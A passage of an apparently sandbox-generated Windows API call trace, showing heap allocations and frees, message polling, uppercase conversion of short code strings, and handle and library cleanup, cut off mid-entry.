[0165.468] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.468] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0165.468] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.468] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.468] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.469] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.469] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0165.469] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0165.469] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.469] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.469] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.470] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.470] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0165.471] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.471] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.471] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.471] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.471] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.471] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.472] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.472] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.472] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.472] CryptReleaseContext (hProv=0xab2890, dwFlags=0x0) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.473] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.474] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.474] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.474] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.474] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.474] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0165.475] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.475] FreeLibrary (hLibModule=0x74d40000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.475] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.475] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.476] CloseHandle (hObject=0x1e8) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.476] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.477] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0165.477] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0165.477] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0165.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.478] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.478] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.478] CloseHandle (hObject=0x170) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.480] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0165.481] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0165.481] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.481] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | 